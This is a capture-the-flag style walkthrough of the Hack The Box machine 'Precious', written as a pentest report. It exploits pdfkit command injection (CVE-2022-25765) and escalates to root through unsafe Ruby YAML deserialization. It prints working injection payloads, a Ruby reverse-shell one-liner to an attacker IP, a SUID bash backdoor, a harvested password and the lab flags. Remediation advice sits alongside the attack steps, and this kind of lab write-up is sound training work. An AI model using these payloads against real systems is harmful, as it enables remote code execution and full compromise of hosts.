Precious

https://app.hackthebox.com/machines/Precious

Summary

Precious is a Linux-based target hosting a "Web to PDF" conversion utility powered by Ruby on Rails. The assessment identified a critical Command Injection vulnerability (CVE-2022-25765) within the underlying pdfkit library, allowing for unauthenticated Remote Code Execution (RCE). Post-exploitation enumeration uncovered cleartext credentials stored within a user's Bundler configuration, facilitating lateral movement via SSH. Final privilege escalation to root was achieved by exploiting an Insecure Deserialization flaw in a sudo-enabled Ruby script that utilized YAML.load on untrusted input.

MITRE Kill Chain

1

Reconnaissance

Network enumeration identified a web server on TCP port 80 and SSH on port 22.

2

Resource Development

A local HTTP server was staged to host malicious payloads for the target application to retrieve.

3

Initial Access

A Command Injection vulnerability in pdfkit v0.8.6 was exploited via a crafted URL parameter to execute arbitrary code.

4

Execution

A Ruby-based reverse shell was executed to establish an interactive session as the ruby user.

5

Credential Access

Cleartext credentials for a secondary user were harvested from the .bundle/config file.

6

Lateral Movement

The compromised credentials were used to authenticate via SSH as the user henry.

7

Privilege Escalation

A Ruby script running with sudo privileges was exploited via Insecure Deserialization (YAML), resulting in full root compromise.

---

Reconnaissance

#attack/T1018 #attack/T1595_001 #attack/T1592

Initial Connectivity & Host Discovery

The assessment began with a connectivity check to the target host. An ICMP echo request was transmitted to verify the status of the asset and estimate the underlying operating system.

attacker> ping -c 1 10.10.11.189
PING 10.10.11.189 (10.10.11.189) 56(84) bytes of data.
64 bytes from 10.10.11.189: icmp_seq=1 ttl=63 time=208 ms

--- 10.10.11.189 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 208.190/208.190/208.190/0.000 ms

The TTL (Time to Live) value of 63 indicates the target is likely a Linux-based system, accounting for a single hop in transit.

Network Service Enumeration

To map the attack surface, a full TCP port scan was performed using nmap. The scan targeted all 65,535 ports to identify open listeners.

attacker> nmap -sS -p- --open --min-rate 5000 -vvv -n -Pn -oG portsTCP.gnmap 10.10.11.189

Following the identification of open ports, a targeted service scan was executed to determine version information and default script output for the discovered services on ports 22 and 80.

attacker> nmap -sCV -p22,80 -vvv -n -Pn -oX scanTCP.xml 10.10.11.189
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
|   3072 84:5e:13:a8:e3:1e:20:66:1d:23:55:50:f6:30:47:d2 (RSA)
|   256 a2:ef:7b:96:65:ce:41:61:c4:67:ee:4e:96:c7:c8:92 (ECDSA)
|_  256 33:05:3d:cd:7a:b7:98:45:82:39:e7:ae:3c:91:a6:58 (ED25519)
80/tcp open  http    syn-ack ttl 63 nginx 1.18.0
|_http-server-header: nginx/1.18.0
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://precious.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The service enumeration revealed the following:

• Port 22: Running OpenSSH 8.4p1 on Debian Bullseye.

• Port 80: Running nginx 1.18.0. The web server responded with a 302 Found redirect to http://precious.htb/, indicating a virtual host-based configuration.

Virtual Host Configuration

To interact with the web application, the local /etc/hosts file was updated to map the IP address 10.10.11.189 to the precious.htb domain.

attacker> grep "precious.htb" /etc/hosts
10.10.11.189    precious.htb

---

Web Exploitation

#attack/T1592 #attack/T1593

Initial technology profiling was performed on http://precious.htb to identify the underlying web stack and potential points of interest.

attacker> whatweb http://precious.htb/ -v | tee whatweb.txt
WhatWeb report for http://precious.htb/
Status    : 200 OK
Title     : Convert Web Page to PDF
IP        : 10.10.11.189
Summary   : HTML5, HTTPServer[nginx/1.18.0 + Phusion Passenger(R) 6.0.15], nginx[1.18.0], Ruby-on-Rails, UncommonHeaders[x-content-type-options], X-Frame-Options[SAMEORIGIN], X-Powered-By[Phusion Passenger(R) 6.0.15], X-XSS-Protection[1; mode=block]
<SNIP>

The target is a Ruby on Rails application served via Phusion Passenger 6.0.15 behind Nginx 1.18.0.

The application is a "Convert Web Page to PDF" utility running on Ruby-on-Rails and served by Phusion Passenger 6.0.15. A search for known vulnerabilities in Phusion Passenger was conducted; however, the results were primarily legacy Windows exploits and did not align with the target environment.

attacker> searchsploit phusion
--------------------------------------------------------------- ---------------------------
 Exploit Title                                                 |  Path
--------------------------------------------------------------- ---------------------------
Phusion WebServer 1.0 - 'URL' Remote Buffer Overflow           | windows/remote/21294.c
Phusion WebServer 1.0 - Directory Traversal (1)                | windows/remote/21291.pl
<SNIP>

Functional Analysis: PDF Conversion

The web interface presents a single input field requesting a URL to be converted into a PDF document.

To test the application's behavior and verify its ability to reach external resources, a local HTTP server was started, and a request was initiated from the web interface.

attacker> echo "Hello Haxor" > index.html
attacker> python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.189 - - [02/Dec/2022 21:21:29] "GET / HTTP/1.1" 200 -

The application successfully retrieved the content from the attacker-controlled server and rendered a PDF.

Vulnerability Discovery: PDFKit Command Injection

#attack/T1190 #owasp/A05_2025 #owasp/A03_2025

Analysis of the generated PDF was performed using exiftool to identify the backend processing engine.

attacker> exiftool jrtl2yok7ptc2fklhh8sa6rlrk6q423w.pdf
ExifTool Version Number         : 12.16
File Name                       : jrtl2yok7ptc2fklhh8sa6rlrk6q423w.pdf
<SNIP>
MIME Type                       : application/pdf
PDF Version                     : 1.4
Creator                         : Generated by pdfkit v0.8.6

The application uses pdfkit v0.8.6 for document generation.

Further research into this version revealed CVE-2022-25765, a critical command injection vulnerability. The flaw exists because the library does not properly sanitize URL parameters. If a URL contains a query string with an encoded shell command (e.g., using backticks or $( )), pdfkit executes the command during the conversion process.

Finding: Command Injection in pdfkit v0.8.6 (CVE-2022-25765)

• Affected Asset: http://precious.htb/ (Backend: Ruby pdfkit library)

• Severity: Critical

• Vulnerability Type: Unauthenticated Remote Code Execution (RCE)

Reproduction Steps:

1

Identify the input field for URL conversion.

2

Submit a payload containing a command within a query parameter, such as: http://<attacker-ip>/?name=#{'%20 sleep 5%'}.

3

Observe the delayed response or execute a reverse shell command.

Remediation: Update the pdfkit gem to version 0.8.7 or higher, which includes proper parameter sanitization.

Exploit Verification

A proof-of-concept was executed to confirm the vulnerability by attempting to echo the current user within the PDF content. By passing the command as a URL parameter, the backend executed the instruction and embedded the output into the resulting document.

# Attacker sets up local environment
attacker> echo "echo $USER" > index.html
attacker> python3 -m http.server 80

# Application makes request to: http://10.10.14.X/?name=%20`whoami`
10.10.11.189 - - [02/Dec/2022 21:24:57] "GET /?name=%20`whoami` HTTP/1.1" 200 -

The resulting PDF confirmed successful execution, displaying the username ruby.

Remote Code Execution (RCE)

The vulnerability in pdfkit v0.8.6 was leveraged to gain arbitrary code execution. By injecting shell commands into the URL parameters passed to the PDF generator, the underlying system executed the commands under the context of the ruby user.

Initial validation was performed by executing the id and hostname -I commands. The payload was structured to satisfy the URL requirement while escaping the application's intended logic.

# Payload submitted to the web interface:
http://10.10.14.153/?name=%20`id; hostname -I`

The resulting PDF document rendered the output of the commands, confirming the execution context and network configuration.

RCE confirmed: The application is executing commands as the ruby user (UID 1001).

Reverse Shell Establishment

To obtain an interactive session, a Ruby-based reverse shell payload was crafted. An HTTP listener was not required for the final payload; instead, a Netcat listener was staged on the attacker machine to intercept the outgoing connection.

# Payload submitted to the web interface:
http://10.10.14.153/?name=%20`ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("10.10.14.153",443))'`

The listener successfully captured the connection, providing a remote shell.

attacker> nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.153] from (UNKNOWN) [10.10.11.189] 52480

whoami
ruby

hostname -I
10.10.11.189

Shell Stabilization

The initial shell was upgraded to a fully interactive TTY to support advanced terminal features and job control.

ruby@precious:/var/www/pdfapp$ script /dev/null -c bash
Script started, output log file is '/dev/null'.
ruby@precious:/var/www/pdfapp$ ^Z
[1]+  Stopped                 nc -nlvp 443

attacker> stty raw -echo; fg
nc -nlvp 443
            reset xterm

ruby@precious:/var/www/pdfapp$ export TERM=xterm SHELL=bash
ruby@precious:/var/www/pdfapp$ stty rows 53 columns 129

---

Lateral Movement

#attack/T1552_001 #attack/T1021_004

Internal Enumeration

Following the establishment of the foothold, the system was enumerated for sensitive files and additional user accounts.

ruby@precious:~$ grep 'sh$' /etc/passwd
root:x:0:0:root:/root:/bin/bash
henry:x:1000:1000:henry,,,:/home/henry:/bin/bash
ruby:x:1001:1001::/home/ruby:/bin/bash

The enumeration identified a secondary user, henry. Investigation of the ruby user's home directory revealed a hidden .bundle directory containing a configuration file.

ruby@precious:~$ ls -la /home/ruby/
total 28
drwxr-xr-x 4 ruby ruby 4096 Dec  2 21:11 .
drwxr-xr-x 4 root root 4096 Oct 26 08:04 ..
lr--r--r-- 1 root root    9 Oct 26 07:53 .bash_history -> /dev/null
-rw-r--r-- 1 ruby ruby  220 Mar 27  2022 .bash_logout
-rw-r--r-- 1 ruby ruby 3526 Mar 27  2022 .bashrc
drwxr-xr-x 2 ruby ruby 4096 Dec  2 21:20 .bundle
drwxr-xr-x 3 ruby ruby 4096 Dec  2 21:11 .cache
-rw-r--r-- 1 ruby ruby  807 Mar 27  2022 .profile

ruby@precious:~$ cat /home/ruby/.bundle/config
---
BUNDLE_HTTPS://RUBYGEMS__ORG/: "henry:Q3c1AqGHtoI0aXAYFH"

Cleartext credentials for the user henry were discovered within the Bundler configuration file.

The discovered credentials were used to authenticate as henry via SSH, granting more persistent access and access to the user's data.

attacker> ssh henry@precious.htb
henry@precious.htb's password: [Q3c1AqGHtoI0aXAYFH]
Linux precious 5.10.0-19-amd64 #1 SMP Debian 5.10.149-2 (2022-10-21) x86_64
<SNIP>
henry@precious:~$ id
uid=1000(henry) gid=1000(henry) groups=1000(henry)

Upon successful login, the user flag was retrieved from the home directory.

henry@precious:~$ cat user.txt 
e06555f977145a1180ad10b3d0fc27c8

---

Privilege Escalation

#attack/T1548_003 #attack/T1210 #owasp/A08_2025

Sudo Rights Enumeration

The user henry was found to have specific sudo privileges that allowed the execution of a Ruby script as the root user without providing a password.

henry@precious:~$ sudo -l
Matching Defaults entries for henry on precious:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User henry may run the following commands on precious:
    (root) NOPASSWD: /usr/bin/ruby /opt/update_dependencies.rb

The target script, /opt/update_dependencies.rb, is owned by root and is not writable by the current user.

henry@precious:~$ ls -la /opt/update_dependencies.rb
-rwxr-xr-x 1 root root 848 Sep 25 11:02 /opt/update_dependencies.rb

Vulnerability Analysis: Insecure Deserialization

Analysis of the Ruby source code revealed a critical security flaw in the way the script handles external configuration files.

henry@precious:~$ cat /opt/update_dependencies.rb
<SNIP>
def list_from_file
    YAML.load(File.read("dependencies.yml"))
end
</SNIP>

The script utilizes the YAML.load method to process a file named dependencies.yml. Because the script uses a relative path and the insecure load method (as opposed to safe_load), an attacker can control the execution flow by placing a malicious YAML file in the current working directory.

Finding: Insecure Deserialization in update_dependencies.rb

• Affected Asset: /opt/update_dependencies.rb

• Severity: Critical

• Vulnerability Type: Insecure Deserialization (Ruby YAML)

Reproduction Steps:

1

Create a file named dependencies.yml in a writable directory.

2

Embed a serialized Ruby object payload designed to trigger Kernel.system execution.

3

Execute the script with sudo from that directory: sudo /usr/bin/ruby /opt/update_dependencies.rb.

Remediation: Replace YAML.load with YAML.safe_load and ensure the script references configuration files using absolute paths.

Vulnerability Verification (PoC)

To verify the vulnerability, a malicious dependencies.yml was created using a known Ruby YAML deserialization gadget chain. The first test aimed to execute the id command as root.

henry@precious:/tmp/exploit$ ls
dependencies.yml

henry@precious:/tmp/exploit$ sudo /usr/bin/ruby /opt/update_dependencies.rb
sh: 1: reading: not found
uid=0(root) gid=0(root) groups=0(root)
Traceback (most recent call last):
<SNIP>

The output confirmed that the command was successfully executed with root privileges.

Root Access Acquisition

The payload was modified to establish a persistent root-level access point. Specifically, the bash binary was copied to the /tmp directory and assigned SUID permissions.

# dependencies.yml payload snippet
# <SNIP>
             git_set: cp /bin/bash /tmp/brunobash; chmod 4777 /tmp/brunobash
         method_id: :resolve

Executing the script again triggered the payload:

henry@precious:/tmp/exploit$ sudo /usr/bin/ruby /opt/update_dependencies.rb
sh: 1: reading: not found
<SNIP>

henry@precious:/tmp/exploit$ ls -la /tmp/brunobash
-rwsrwxrwx  1 root  root  1234376 Dec 19 23:05 /tmp/brunobash

By executing the SUID bash binary with the -p (preserve permissions) flag, a root shell was obtained.

henry@precious:/tmp/exploit$ /tmp/brunobash -p
brunobash-5.1# whoami
root

brunobash-5.1# cat /root/root.txt 
e202b3ffe79fc3b635b364bb9ab87ced

Privilege escalation successful. Full system compromise achieved.